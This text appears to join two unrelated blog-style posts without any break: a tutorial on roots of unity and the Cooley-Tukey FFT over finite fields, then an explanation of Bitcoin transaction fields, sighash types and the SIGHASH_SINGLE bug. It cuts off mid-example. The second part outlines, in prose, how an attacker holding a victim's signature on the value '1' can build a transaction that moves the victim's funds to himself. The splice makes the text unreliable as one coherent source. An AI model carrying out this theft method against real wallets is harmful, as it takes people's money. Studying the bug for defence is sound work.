The proof is very straightforward: since $i|n$ we can write $n=k\cdot i$ for some integer $k$. Now we can prove that $r$ is a ROU of order $n$ by showing that $r^n = 1$, which is exactly the case because:
\[r^n = r^{ik} = (r^i)^k = 1 ^k = 1\]Notice that $r^i = 1$ because we assumed $r$ is a ROU of order $i$.
From this observation we define a special kind of ROUs, called primitive roots of unity:
Definition [primitive root of unity]: Let $r$ be a field element and let $i$ be an integer. We say that $r$ is a primitive root of unity (PROU) of order $i$ if $r$ is a root of unity of order $i$ but isn’t a root of unity of order $j$ for any $1 \lt j \lt i$.
Following this definition we can tell that $2$ is a PROU of order 4, because $2^4 = 1$ but $2^1, 2^2, 2^3$ are all not equal to $1$. However, $4$ is not a PROU of order 4, because even though $4^4 = 1$ we also have $4^2 = 1$.
Another way to think about ROUs and PROUs is through the order of elements.
Definition [order of an element]: Given a non-zero field element $e$, the order of $e$ is the smallest positive integer $k$ such that $e^k = 1$. We denote the order $e$ as $\text{ord}(e)$.
Therefore, an element $e$ is $k^{\text th}$-PROU if $\text{ord}(e)=k$.
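These definitions are easy to explore in code; a tiny sketch that computes the order of every non-zero element of $\mathbb{Z}/5\mathbb{Z}$, matching the examples above:

```python
# Compute the order of each non-zero element of Z/5Z by repeated
# multiplication until we hit 1.
p = 5

def order(e):
    k, acc = 1, e % p
    while acc != 1:
        acc = acc * e % p
        k += 1
    return k

for e in range(1, p):
    print(e, order(e))   # prints: 1 1, 2 4, 3 4, 4 2
# So 2 and 3 are primitive 4th roots of unity, while 4 is a ROU of
# order 4 but not a primitive one (its order is 2).
```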
Ok, so now that we know a little about roots of unity, you are probably wondering, what do they have to do with FFTs? We have already said that FFTs can be thought of as an algorithm to quickly change the representation of a polynomial of degree $\lt n$ from coefficient-representation to evaluation-representation and vice-versa where the evaluation is computed over $n$ points who are $n^{\text th}$ roots of unity.
Let’s give a more explicit definition for FFTs.
Let $n$ be a number and assume we have a field element $g$ such that $\text{ord}(g)=n$, so $g$ is an $n^{\text th}$ PROU. The FFT algorithm takes $n$ values $x_0,…,x_{n-1}$ and computes $n$ new values $X_0,…,X_{n-1}$ such that:
\[X_k = \sum_{i=0}^{n-1}x_i\cdot g^{ki}\]To make the definition more straightforward, we can think of a polynomial $P(e)=\sum x_i\cdot e^i$. (Notice - $P$ is a function of $e$!) And define:
\[X_k = P(g^k)\]So, we compute $X_0,…,X_{n-1}$ as the evaluations of $P(e)$ on the powers of an $n^{\text th}$ PROU $g$, which are $g^0,g^1,…,g^{n-1}$. Notice that this usage of $P$ perfectly aligns with our theory about FFTs and their use cases so far. The coefficients of $P$ are the given $x_0,…,x_{n-1}$ and we use the FFT to obtain the evaluations of $P$ at the $n^{\text th}$ ROUs, which are exactly $X_0,…,X_{n-1}$.
In this context we usually call $n$ the size of the FFT.
There are various algorithms to compute FFTs; we will focus on the most basic one, also known as the Cooley-Tukey algorithm (CT), which was invented by Gauss and rediscovered independently in the 1960s by Cooley and Tukey.
At its core, the CT algorithm computes an FFT of size $n$ where $n$ is a product of many small primes. It is common to call such numbers smooth numbers. For example, $n=2^{13}$ is a smooth number, and $n=2^7\cdot 3^5\cdot 11^3$ is also smooth, but $n=67,280,421,310,721 \cdot 524,287$ is not. CT can also work for non-smooth FFT sizes, but it only becomes really efficient for smooth sizes. In other words, the smoother the size of the FFT, the bigger the advantage of the CT algorithm over the traditional $\mathcal{O}(n^2)$ algorithm.
In the rest of this section I’ll try to first give some informal sense behind the core idea of the CT algorithm. Next, I’ll give the explicit algorithm for both the FFT and the inverse FFT in the spirit of CT.
Let $\mathbb{Z}/p\mathbb{Z}$ be a finite field of prime size $p$. Let $n$ be a number dividing $p-1$ and let $P(x)$ be a polynomial of degree at most $n-1$ over $\mathbb{Z}/p\mathbb{Z}$. We are given the coefficient-representation of $P$, so $P(x)=\sum_{i=0}^{n-1}a_ix^i$ where $a_0,…,a_{n-1}$ are all elements of the field $\mathbb{Z}/p\mathbb{Z}$.
Since $n$ divides $p-1$ we have an $n^{\text th}$-PROU; denote it by $g$. So $g^i \neq 1$ for $1\leq i \leq {n-1}$ and $g^n = 1$. Let’s assume that $n$ is smooth, in particular that $n=2^k$ for some integer $k$, so $n$ is a power of two.
We can write the polynomial $P(x)$ as follows:
\[\begin{align} P(x) &= \sum_{i=0}^{n-1}a_ix^i \\ &= \overbrace{\sum_{i=0}^{n/2-1}a_{2i}x^{2i}}^{\text{even-index terms}}&+\overbrace{\sum_{i=0}^{n/2-1}a_{2i+1}x^{2i+1}}^{\text{ odd-index terms}}\\ &= \underbrace{\sum_{i=0}^{n/2-1}a_{2i}(x^{2})^i}_{P_0(x^2)}&+x\underbrace{\sum_{i=0}^{n/2-1}a_{2i+1}(x^{2})^i}_{P_1(x^2)}\\ &= P_0(x^2)+x\cdot P_1(x^2) \end{align}\]So we can express $P(x)$ using $P_0(x^2)$ and $P_1(x^2)$ where $P_0,P_1$ are polynomials (and a little multiplication by $x$). Let’s write those polynomials explicitly, we replace the $x^2$ term with a $y$ so $P_0(y),P_1(y)$ will be our polynomials.
\[\begin{align} P_0(y) &= \sum_{i=0}^{n/2-1}a_{2i}y^i & \text{and}\quad & P_1(y) &= \sum_{i=0}^{n/2-1}a_{2i+1}y^i \end{align}\]The following figure visualizes the reduction step for a polynomial of degree $8$:
The degree of each polynomial is less than half the degree of the original polynomial, so we have reduced the problem of evaluating a polynomial to the problem of evaluating two polynomials of half the degree (plus some extra linear-time processing to multiply $P_1(x^2)$ by the remaining $x$ term), right?
Well no, not yet. The original problem was evaluating a degree $\lt n$ polynomial $P(x)$ over the $n^{\text th}$-ROUs in $\mathbb{Z}_p$ ($g^0,…,g^{n-1}$). Our two new polynomials still have to be evaluated over $n$ points and not over $n/2$ points!
To reduce the number of evaluation points we add another observation. Notice that in expressing $P(x)=P_0(x^2)+x\cdot P_1(x^2)$ we evaluate both $P_0$ and $P_1$ on $x^2$ and not on $x$. Originally we were evaluating $P(x)$ where $x$ is an $n^{\text th}$-ROU, so its square $x^2$ is a $(n/2)^{\text th}$-ROU. Since there are only $n/2$ ROUs of order $n/2$, we have to make only $n/2$ evaluations of $P_0$ and $P_1$.
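The even/odd decomposition can be checked numerically. A small sketch in Python over $\mathbb{Z}/5\mathbb{Z}$ (the helper `ev` is my own naive evaluator, introduced only for this check):

```python
# Numeric check of P(x) = P0(x^2) + x * P1(x^2) over Z/5Z.
def ev(coeffs, x, p):
    """Naively evaluate a polynomial given by its coefficients at x, mod p."""
    return sum(c * pow(x, i, p) for i, c in enumerate(coeffs)) % p

p = 5
P  = [1, 2, 3, 4]        # 1 + 2x + 3x^2 + 4x^3
P0 = P[0::2]             # even-index coefficients: [1, 3]
P1 = P[1::2]             # odd-index coefficients:  [2, 4]
for x in range(1, p):
    assert ev(P, x, p) == (ev(P0, x * x % p, p) + x * ev(P1, x * x % p, p)) % p
```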
So, to evaluate $P(x)$ where $x$ is an $n^{\text th}$-ROU, we take the evaluation of $P_0$ at $x^2$, a $(n/2)^{\text th}$-ROU, and add to it the evaluation of $P_1$ at $x^2$, multiplied by $x$. In conclusion, to evaluate $P(x)$ over the $n$ ROUs of order $n$, we have to:
For completeness, notice that at the end of the recursion, if the FFT size is $1$ then $P(x)$ is of degree $0$, so $P(x)=c$ for some field element $c$, and thus its evaluation on a single point is exactly $c$.
To summarize, our FFT algorithm goes as follows:
Input
Output
Algorithm
If $n=1$ return $[c_0]$, because our polynomial is of degree $\lt 1$, so its degree is $0$. Therefore the coefficient $c_0$ is the evaluation $P(g^0)$.
Split $P(x)$ into two polynomials:
Compute, recursively, the evaluations of $P_0(x),P_1(x)$ on the $n/2$ powers of $g^2$, a PROU of order $n/2$.
Let ${\bf S},{\bf T}$ be the arrays of length $n/2$ containing the evaluations of $P_0,P_1$ respectively from the recursive invocation. So ${\bf S}[i]=P_0((g^2)^i)$ and ${\bf T}[i]=P_1((g^2)^i)$. The polynomials $P_0,P_1$ satisfy: $P(x) = P_0(x^2) + x \cdot P_1(x^2)$.
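The steps above can be sketched as a short recursive implementation. A minimal sketch in Python over $\mathbb{Z}/p\mathbb{Z}$, assuming $n$ is a power of two; the example field $\mathbb{Z}/5\mathbb{Z}$ and PROU $g=2$ follow the earlier examples:

```python
# A minimal recursive Cooley-Tukey FFT over Z/pZ, following the steps above.
# Assumes len(coeffs) is a power of two and g is a PROU of that order mod p.
def fft(coeffs, g, p):
    n = len(coeffs)
    if n == 1:
        return coeffs[:]                 # degree-0 polynomial: P(g^0) = c0
    S = fft(coeffs[0::2], g * g % p, p)  # evaluations of P0 at powers of g^2
    T = fft(coeffs[1::2], g * g % p, p)  # evaluations of P1 at powers of g^2
    out = [0] * n
    gi = 1                               # g^i, updated per iteration
    for i in range(n // 2):
        out[i]          = (S[i] + gi * T[i]) % p  # P(g^i)
        out[i + n // 2] = (S[i] - gi * T[i]) % p  # P(g^(n/2+i)), since g^(n/2) = -1
        gi = gi * g % p
    return out

# Example over Z/5Z with the 4th PROU g = 2:
print(fft([1, 2, 3, 4], 2, 5))           # [0, 4, 3, 2]
```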
Let $T(n)$ denote the number of computational steps we have to perform for an FFT of size $n=2^k$. We have to solve a similar problem of size $n/2$ twice, plus $n$ additions and $n$ multiplications. So:
\[\begin{align} T(n) &= 2\cdot T(n/2) + 2n \\ &= 2\cdot \left(2\cdot T(n/4) + 2\cdot \frac{n}{2}\right) \\ &= 4\cdot T(n/4) + 4n \\ &= 4\cdot \left(2\cdot T(n/8) + 2\cdot \frac{n}{4}\right) \\ &= 8\cdot T(n/8) + 6n \\ &= ... \\ &=n \cdot T(1) + 2\cdot \log_2(n)\cdot n \\ &= \mathcal{O}(n\cdot \log_2(n)) \end{align}\]We devised a $\mathcal{O}(n\log(n))$ algorithm to change the representation of a polynomial from coefficient-representation to evaluation-representation of $n$ ROUs of order $n$. As we will explain next, the inverse FFT (from evaluation into coefficient representation) also takes $\mathcal{O}(n\log(n))$ and thus we will be able to multiply polynomials in $\mathcal{O}(n\log(n))$ time.
The Inverse-FFT (IFFT) algorithm, as its name suggests, simply reverts the operation of the original FFT algorithm. Namely, let $g$ be a $n^{\text{th}}$-PROU. The IFFT algorithm takes $P(g^0),P(g^1),…,P(g^{n-1})$, the evaluation-representation of some polynomial $P(x)$ of degree $\lt n$ and outputs the coefficient-representation $P(x)=\sum_{i=0}^{n-1}c_ix^i$.
In this section we’ll give an informal explanation about the IFFT algorithm. As we did with the FFT algorithm, we’ll assume for the sake of simplicity that $n$ is a smooth number, $n=2^k$. If we could find the coefficient representation of two polynomials $P_0$ and $P_1$ both of degree $\lt n/2$ such that:
\[P(x) = P_0(x^2) + x \cdot P_1(x^2)\]Then we could immediately derive the coefficient representation of $P$. Let’s see how it’s done.
If $P_0(y) = \sum_{i=0}^{n/2 -1} a_{i}y^i$ and $P_1(y)=\sum_{i=0}^{n/2 -1} b_iy^i$ then:
\[\begin{align} P(x) &= P_0(x^2) + x\cdot P_1(x^2) \\ &= \sum_{i=0}^{n/2-1}a_ix^{2i} + x \cdot \sum_{i=0}^{n/2-1}b_ix^{2i}\\ &= \sum_{i=0}^{n/2-1}(a_ix^{2i} + b_ix^{2i+1}) \end{align}\]Therefore, $c_{2i}$ the coefficient of $x^{2i}$ in $P(x)$ is $a_i$. Similarly, $c_{2i+1} = b_i$, the coefficient of $x^{2i+1}$ in $P(x)$. So, if we had the coefficient-representation of such $P_0, P_1$ we could obtain coefficient-representation of $P$.
At this point you’ve probably noticed already that this could be our recursive step! We split the problem of obtaining the coefficient representation of a degree $\lt n$ polynomial into obtaining the coefficient representation of two degree $\lt n/2$ polynomials.
The only thing left to do then, is to translate the input of our original problem (evaluations of $P$ on all $n^{\text{th}}$-ROUs) into the inputs of our new, smaller, problems (evaluations of $P_0$ and $P_1$ on all $(n/2)^{\text{th}}$-ROUs).
We know (from the FFT algorithm) that polynomials $P_0,P_1$ of degree $\lt n/2$ exist such that $P(x)=P_0(x^2)+x\cdot P_1(x^2)$. Now, let $g$ be a $n^\text{th}$-PROU. And let $i$ be an integer in the range $\left[0,n/2\right)$. We have the following two equations obtained by setting $x=g^i$ and $x=g^{n/2+i}$ in the equation above:
\[\begin{align} P(g^i) &= P_0(g^{2i}) + g^i\cdot P_1(g^{2i}) \\ P(g^{n/2+i}) &= P_0(g^{2(n/2 +i)}) + g^{n/2+i}\cdot P_1(g^{2(n/2+i)}) \\ \end{align}\]Arranging the second equation a little bit we get:
\[\begin{align} P(g^i) &= P_0(g^{2i}) + g^i\cdot P_1(g^{2i}) \\ P(g^{n/2+i}) &= P_0(g^{n}g^{2i}) + g^{n/2}g^i\cdot P_1(g^{n}g^{2i}) \\ \end{align}\]Now, recall that $g$ is $n^\text{th}$-PROU so $g^n=1$ and $g^{n/2}=-1$. Substituting these two identities in the second equation, we get:
\[\begin{align} P(g^i) &= P_0((g^2)^i) + g^i\cdot P_1((g^2)^i) \\ P(g^{n/2+i}) &= P_0((g^2)^i) - g^i\cdot P_1((g^2)^i) \\ \end{align}\]This is looking good! Let’s see what we have:
So we have to solve a system of two equations with two variables. Solving it we get:
\[\begin{align} P_0((g^2)^i) &= \frac{P(g^i) + P(g^{n/2 +i})}{2} \\ P_1((g^2)^i) &= \frac{P(g^i) - P(g^{n/2 +i})}{2 g^i} \end{align}\]By solving this system of equations for all values of $i$ we get the $n/2$ evaluations of $P_0$ and $P_1$ of the powers of $g^2$ which is a PROU of order $n/2$.
This was the recursive step. The recursion ends when $P$ is of degree $\lt 1$; in that case $P$ is of degree $0$, so $P(x)=c$ is a constant polynomial, and we are given its evaluation at the point $g^0=1$. So we have $P(1)=c$ and therefore the evaluation itself is exactly the single coefficient of our polynomial.
Let’s try and write the algorithm:
Input
Output
Algorithm
Otherwise, compute arrays ${\bf S},{\bf T}$ of length $n/2$ such that: \(\begin{align} {\bf S}[i] &= \frac{ {\bf P}[i]+{\bf P}[n/2+i]}{2}\\ {\bf T}[i] &= \frac{ {\bf P}[i]-{\bf P}[n/2+i]}{2\cdot g^i} \end{align}\) These arrays are the evaluations of polynomials $P_0,P_1$ such that $P(x)=P_0(x^2)+x\cdot P_1(x^2)$ over the $n/2$ powers of $g^2$.
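The recursive step above can be sketched in Python, matching the FFT sketch's conventions (over $\mathbb{Z}/p\mathbb{Z}$, $n$ a power of two). Division in the field is multiplication by a modular inverse, computed here via Fermat's little theorem:

```python
# A recursive IFFT sketch: recover S, T from the evaluations, recurse,
# then interleave the coefficients (c_{2i} = a_i, c_{2i+1} = b_i).
def ifft(evals, g, p):
    n = len(evals)
    if n == 1:
        return evals[:]                  # constant polynomial: c = P(1)
    inv2 = pow(2, p - 2, p)              # 1/2 mod p (Fermat's little theorem)
    S, T = [0] * (n // 2), [0] * (n // 2)
    gi = 1
    for i in range(n // 2):
        a, b = evals[i], evals[i + n // 2]          # P(g^i), P(g^(n/2+i))
        S[i] = (a + b) * inv2 % p                   # P0((g^2)^i)
        T[i] = (a - b) * inv2 * pow(gi, p - 2, p) % p  # P1((g^2)^i)
        gi = gi * g % p
    c0 = ifft(S, g * g % p, p)           # coefficients of P0
    c1 = ifft(T, g * g % p, p)           # coefficients of P1
    out = [0] * n
    out[0::2], out[1::2] = c0, c1        # interleave back into P's coefficients
    return out

# Round-trip check over Z/5Z: [0, 4, 3, 2] is the FFT of [1, 2, 3, 4] with g = 2.
print(ifft([0, 4, 3, 2], 2, 5))          # [1, 2, 3, 4]
```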
What if $n$ isn’t a power of 2? In both our FFT and inverse FFT we were expressing the input polynomial $P(x)$ using two polynomials $P_0,P_1$ such that:
\[P(x) = P_0(x^2)+x\cdot P_1(x^2)\]This was simple because the group of powers of $g$, our $n^\text{th}$-PROU could be split into pairs of elements $g^{i}$ and $g^{i+n/2}$ such that the squarings of both are equal to $g^{2i}$.
So, if $n$ isn’t a power of two, for example, $n=3\cdot m$, we can split the polynomial $P$ using three polynomials $P_0,P_1,P_2$ such that:
\[P(x) = P_0(x^3) + x\cdot P_1(x^3) + x^2 \cdot P_2(x^3)\]This will utilize the fact that the order of $g$ is a multiple of $3$ and therefore we can split the powers of $g$ into triplets $g^{i}, g^{n/3 +i}, g^{2n/3+i}$ such that cubing them (i.e., raising them to the power of $3$) yields $g^{3i}$.
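The three-way split can be checked numerically the same way as the two-way split. A small sketch over $\mathbb{Z}/7\mathbb{Z}$ (an arbitrary choice of field for illustration; `ev` is again a naive evaluator of my own):

```python
# Numeric check of P(x) = P0(x^3) + x*P1(x^3) + x^2*P2(x^3), over Z/7Z.
def ev(coeffs, x, p):
    return sum(c * pow(x, i, p) for i, c in enumerate(coeffs)) % p

p = 7
P = [1, 2, 3, 4, 5, 6]                   # degree-5 polynomial
P0, P1, P2 = P[0::3], P[1::3], P[2::3]   # coefficients a_{3i}, a_{3i+1}, a_{3i+2}
for x in range(1, p):
    x3 = pow(x, 3, p)
    assert ev(P, x, p) == (ev(P0, x3, p) + x * ev(P1, x3, p)
                           + x * x * ev(P2, x3, p)) % p
```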
We will also call the number of polynomials $P(x)$ was split into the split-factor of this recursive step. Notice that if $n$ has different prime factors we may use a different split-factor in each recursive step.
We stated at the beginning of the post that we prefer the case in which $n$ is smooth. Why is that? If you closely pay attention you’ll notice that step 5 of the FFT and step 2 of the IFFT are both taking $n\cdot s$ time where $n$ is the length of the input and $s$ is the split factor. For example, if the split factor is $3$ then each entry in the output of the FFT is computed using three evaluations, one from $P_0$ one from $P_1$ and one from $P_2$. Overall, we make $n \cdot 3$ operations.
Now, if instead of $3$ we use a very large prime, say $3259$, then each entry in the output will require at least $3259$ field operations, taking us closer to the school-book algorithm and slowing things down. Therefore, given a polynomial $P(x)$ whose degree is not a power of $2$, we look at $P$ as a polynomial of degree $\lt 2^k$ for some $k$ and solve an FFT of size $2^k$. This may not work if we are specifically interested in the evaluations at some PROU of order $n$ which is not a power of 2.
It would have been really nice if finite fields had PROUs of smooth orders so we could use them to construct efficient FFTs. The problem is that finite fields don’t always have a root of unity of order $n$ for any $n$, so computing FFTs of the closest power of $2$ may not work. To make things clear, let’s look at secp256k1
The order of the generator of secp256k1 is the prime number: p=0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141.
The scalars we use are elements in the field $\mathbb{Z}/p\mathbb{Z}$. So, the multiplicative group is of size $p-1$ whose factorization is $2^6\cdot 3 \cdot 149 \cdot 631 \cdot p_0 \cdot p_1 \cdot p_2$ where $p_0,p_1,p_2$ are some very large primes.
The order of each non-zero element in the field must divide $p-1$ and therefore we don’t have a PROU for any order of our choice. Actually, even if we consider $149$ and $631$ to be “small primes”, the largest FFT we can compute over this field is of size $2^6\cdot 3 \cdot 149 \cdot 631=18,051,648$.
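The arithmetic is easy to verify directly. A short check in Python, using the prime $p$ quoted above and the smooth factors $2^6\cdot 3\cdot 149\cdot 631$ from the stated factorization of $p-1$:

```python
# Checking the claim: the smooth part of p - 1 is 2^6 * 3 * 149 * 631
# = 18,051,648, and it indeed divides p - 1 for secp256k1's scalar field.
p = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
smooth = 2**6 * 3 * 149 * 631
print(smooth)                  # 18051648
print((p - 1) % smooth == 0)   # True
```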
In other words, the largest “smooth” PROU we can find in this field is of order $18,051,648$. Since the size of the field is directly connected to the size of the group of scalars in the secp256k1 curve, this may prevent us from constructing efficient FFTs for interesting applications relating to this curve.
One implication of this is that many projects that rely on FFTs of very high orders use $\text{BLS12-381}$ curve which has $2^{32}$ as a factor of the multiplicative group of the scalars. If you want to compute FFTs over the scalar field of some curve which doesn’t have a large smooth factor, you may consider other options such as using ECFFTs.
In this post we have introduced FFTs and explained why they are needed. We have also presented one of the most popular FFT algorithms, the Cooley-Tukey algorithm, and its inverse, the IFFT algorithm.
Just a list of abbreviations I used in this post:
To better explain it we’ll first have to get acquainted a little bit deeper with Bitcoin’s transaction format. So a bitcoin transaction has the following fields.
- `version`
- `witnessFlag`, optional.
- `inputsNum`, the number of inputs in the transaction.
- `inputs`, an array of length `inputsNum` describing the inputs of the transaction.
- `outputsNum`, the number of outputs in the transaction.
- `outputs`, an array of length `outputsNum` describing the outputs of the transaction.
- `witnessInfo`, optional, exists only if `witnessFlag` is specified.
- `locktime`, can be used to apply some restrictions on the outputs of this transaction.

We will not be explaining the meaning of all fields with all edge cases involved, but the general sense you should get is that transactions are typically the conversion of a set of existing unspent-transaction-outputs (UTXOs) into a set of new UTXOs.
The existing UTXOs, spent in the transaction are referred to as the inputs of the transaction. When creating a transaction, we specify in field 3 the number of inputs and in field 4 the inputs themselves. Similarly, new UTXOs, created in the transaction are referred to as the outputs of the transaction. Thus, when creating a transaction, we specify in field 5 the number of outputs and in field 6 the outputs themselves.
Let’s looks at the inside of these inputs and outputs and what information is required to encode them. We shall begin with outputs since they are simpler and contain fewer pieces of information. An output of a transaction contains the following two attributes:
- `value`, how many satoshis are stored in this output.
- `scriptPubkey`, who can spend the coins in this output.

While the `value` attribute is easy to grasp, you can think of the `scriptPubkey` attribute as a puzzle that whoever wants to spend this output has to solve.
When you’re sending some coins to your friend, she gives you her Bitcoin address; this address is directly decoded into the `scriptPubkey`, so your Bitcoin wallet will specify in the output a puzzle that only your friend can solve, using her private key.
This puzzle is specified under the hood using a “programming language” dedicated to Bitcoin called “script” (yeah the name isn’t that original…).
You can find further information about Bitcoin scripts here.
Great, now let’s move to the inputs. An input contains the following four fields:
- `txid`, the hash of the transaction which contains the output we’re spending in this input.
- `vout`, the transaction with hash `txid` may contain multiple outputs; this field specifies which of the outputs of that transaction we are spending in this input.
- `scriptSig`, the solution to the puzzle of the output being spent, which typically includes a digital signature.
- `sequence`, used for RBF signalling, irrelevant for this article.

With all the given information, the following is a schematic format of the transaction:
Let’s take an example: suppose Alice has 1 BTC she received in a transaction with txid `ab01...0342` (we’ll be using abbreviated notation instead of writing a long transaction ID).
Thus, this transaction has a single output worth 1 BTC which can only be spent using Alice’s private key.
Alice wants to send this 1 BTC to Bob.
To do so, she asks Bob for his address, which encompasses Bob’s public key.
Next, she creates a transaction with a single input, referring to the first output from previous transaction (so vout = 0
and txid = ab01...0342
), she computes her signature using her private key for this input, thereby authorizing the payment and attaches it to the scriptSig
field in the input.
In the outputs section of the transaction she creates a single output with `value = 100,000,000`, which is 100,000,000 satoshis, that is a single BTC, and writes Bob’s public key in the `scriptPubkey` field.
The resulting transaction, ignoring irrelevant fields, looks something like this:
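As a concrete sketch, Alice's transaction could be written out as the following Python dict (a schematic illustration using the field names from the format above, not a real serialization; the placeholder strings are mine):

```python
# A schematic sketch (not real serialization) of Alice's transaction,
# using the field names from the transaction format above.
alice_tx = {
    "version": 2,
    "inputsNum": 1,
    "inputs": [{
        "txid": "ab01...0342",   # abbreviated, as in the running example
        "vout": 0,               # the first output of that transaction
        "scriptSig": "<Alice's signature + public key>",
        "sequence": 0xFFFFFFFF,
    }],
    "outputsNum": 1,
    "outputs": [{
        "value": 100_000_000,    # satoshis: exactly 1 BTC
        "scriptPubkey": "<puzzle only Bob's private key can solve>",
    }],
    "locktime": 0,
}
assert alice_tx["outputs"][0]["value"] == 100_000_000
```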
Now that we know roughly how transactions work, let’s get a little bit deeper into the scriptSig
field.
In our previous example Alice was computing a signature of the transaction she was sending to Bob.
Digital signatures (such as ECDSA signatures used in Bitcoin) are considered hard to forge without owning the private key.
That means that without the private key an attacker using Alice’s previous signatures will not be able to generate a new signature authorizing the spending of one of her UTXOs.
When computing a digital signature, the signing procedure typically takes an arbitrarily sized buffer, computes the hash of the contents of this buffer, and applies the mathematical signing procedure to the hash of the message, resulting in the actual signature.
So, when Alice is computing the digital signature, what exactly is this buffer that will be passed into the signing procedure?
The most common case is that all contents of the transaction (besides the signature itself, of course) are signed; this is probably what you would expect, and even implement yourself, if you were trying to write your own version of Bitcoin.
However, in Bitcoin other modes are available which allow the spender to sign only part of the information in the transaction to allow higher degrees of freedom and perhaps more sophisticated use cases.
The exact mode comes right after the digital signature in the scriptSig
field and is encoded using a single byte known as a SIGHASH_TYPE
.
So we already know that there is a piece of information encoded in the scriptSig
field of each input of a transaction that dictates which pieces of information in the transaction the spender will sign.
One common feature to all possible modes is that the input being spent (i.e. the input for which we compute the scriptSig
) is being signed.
There are six possible options for the `sighash` byte, which will be introduced in the following sections.
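Before going through the six types: each of them is a single byte combining a base mode with an optional flag. The constant values below are the actual Bitcoin ones (`0x01`, `0x02`, `0x03`, and the flag `0x80`):

```python
# The six sighash-type bytes: a base mode, optionally OR'ed with ANYONECANPAY.
SIGHASH_ALL          = 0x01
SIGHASH_NONE         = 0x02
SIGHASH_SINGLE       = 0x03
SIGHASH_ANYONECANPAY = 0x80   # a flag, combined with one of the base modes

six_types = [base | flag
             for flag in (0x00, SIGHASH_ANYONECANPAY)
             for base in (SIGHASH_ALL, SIGHASH_NONE, SIGHASH_SINGLE)]
print([hex(t) for t in six_types])  # ['0x1', '0x2', '0x3', '0x81', '0x82', '0x83']

# Recovering the base mode from a sighash byte, as Bitcoin's code does
# with the mask 0x1f:
assert (0x83 & 0x1f) == SIGHASH_SINGLE
```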
Let’s say we have a transaction with two inputs and three outputs and we are computing the signature for the scriptSig
in the second input.
In the following we present all sighash types accompanied with a visual representation of the said transaction where the inputs / outputs that are signed are colored in green.
The first sighash type is SIGHASH_ALL
in which all inputs and all outputs of the transaction are signed.
Almost all signatures in Bitcoin’s blockchain are accompanied by this kind of sighash type.
In this sighash type all outputs are signed, but the `SIGHASH_ANYONECANPAY` flag signifies that only one of the inputs is signed: the input for which this sighash type is specified.
This means, as its name suggests, that anyone else who has this transaction can join and add inputs to this transaction as long as it preserves the same outputs that are signed.
In other words, since the spender isn’t signing other inputs except his own input, anyone else can take this transaction and modify it by adding another input as long as he doesn’t modify the outputs that are provided with the original transaction.
Consider the following scenario, you and three other friends would like to buy a gift to another friend for her birthday.
The gift costs 10000 satoshis which should be sent to the address of the merchant and you have decided to split the payment evenly, so each one of you pays 2500 satoshis.
To accomplish the payment, you and your friends will sign (separately) the spending of a UTXO with 2500 satoshis which will be sent to the merchant (as the first output). Notice that the output will contain the value of `10000` even though each friend signs only an input of 2500.
By merging these signed inputs you can create a valid transaction and send it to the merchant.
In this sighash type none of the outputs is signed and all inputs are signed. Therefore, when signing an input using this sighash type, the spender is saying “I’m OK with spending this input as long as the other inputs which I’m signing on are also spent. I’m also OK that the coins associated with this input will be sent to wherever the other spenders decide”.
In this sighash type none of the outputs is signed and only the input being spent is signed. Therefore, when signing an input using this sighash type, the spender is saying “I’m OK with spending this input and I really don’t care what will eventually happen with it”. Anyone who receives such an input can take it and spend it in any way they see fit. This is because the sighash doesn’t apply any constraints on any other input or output in the transaction. What you may expect to happen eventually is that the miner who sees a transaction containing such a sighash type will take the input for himself. And this just might happen!
In this sighash type all inputs are signed and only one output is signed.
Namely, if we are trying to spend input number 2 (therefore, computing the `scriptSig` for that input), we will sign the output with the matching index, in our case output number 2.
When spending such an input the spender is saying “I’m OK with spending this input in any transaction that contains this specific output, as long as all other inputs I’m signing on are also taking part in the transaction”.
The other parties signing the rest of the inputs can add outputs to the transaction as they see fit, as long as the value of all outputs isn’t above the value of all inputs, of course.
In this sighash type, only one input is signed and one output is signed.
Just like SIGHASH_SINGLE
, the output which will be signed is the output with the matching index to the index of the input being signed.
When spending an input using this sighash the spender is saying “I’m OK with spending this input in any transaction that also contains this output on which I’m signing”.
Now that we know what a sighash is and what the six types of sighashes are, it’s time to share the bug with you.
The issue lies within the definition of SIGHASH_SINGLE
and SIGHASH_SINGLE | SIGHASH_ANYONECANPAY
.
Specifically, both sighash types sign a single output with the matching index as the index of the input for which this sighash mode is specified.
But what if no such output exists?
What do we hash in that case?
Well, this is a great question so please first stop and try to think what you might have expected to happen in such a scenario.
While you have probably thought of either forbidding such transactions from being mined (as part of Bitcoin’s consensus rules) or simply interpreting the sighash type as SIGHASH_NONE
or SIGHASH_NONE | SIGHASH_ANYONECANPAY
, thereby signing only the inputs, neither of these is what actually happens.
What happens is, the signer simply signs the hash of the 256-bit little-endian number “0000…0001”, which we will simply call “1” for the sake of brevity.
That is, while typically messages are hashed and signed, in this case no message is provided and the signing algorithm is directly given the said value of “1”.
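This degenerate behavior can be mimicked in a short Python sketch (the function name and stand-in hash value are hypothetical, for illustration only; the real C++ code appears later in this post):

```python
# A sketch of the buggy behavior (hypothetical names, not the real Bitcoin
# code): with SIGHASH_SINGLE and no matching output, the "hash" that ends
# up being signed degenerates to the constant 1.
SIGHASH_SINGLE = 0x03

def signature_hash(tx_outputs_num: int, input_index: int, sighash: int) -> int:
    if (sighash & 0x1f) == SIGHASH_SINGLE and input_index >= tx_outputs_num:
        return 1          # "error code" that is then signed as if it were a hash
    return 0xDEADBEEF     # stand-in for the real transaction hash

# Input #1 of a transaction with a single output: no matching output exists,
# so the value 1 is what gets signed.
assert signature_hash(tx_outputs_num=1, input_index=1, sighash=SIGHASH_SINGLE) == 1
```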
Can you think of any meaningful implication for this?
The most prominent implication of this behavior is that if an attacker manages to obtain, by any means, the signature of “1” from your private key, he will immediately gain indefinite access to your funds.
In other words, if you publish a signature on the hash value “1”, you can kiss goodbye to all your funds from the associated address.
Why is that?
How can this be exploited?
If you publish a signature on hash “1” using the secret key associated with your Bitcoin address, the attacker can take this signature, stick it in the scriptSig
field of an input with sighash type of SIGHASH_SINGLE
and place this input as the second input in a transaction with two inputs, where the first input would be any UTXO owned by the attacker which the attacker can spend.
The single output of this transaction will be destined to the attacker with all value from both inputs (his own input and the victim’s input) sent to him.
Let’s visualize the attack and exemplify it: consider a victim who owns some UTXO with a value of `Y` satoshis, and suppose we have a signature of the victim on the hash value “1”. On the other side there’s an attacker with a UTXO he owns with a value of `X` satoshis. The “ingredients” for the attack, therefore, would look like this:
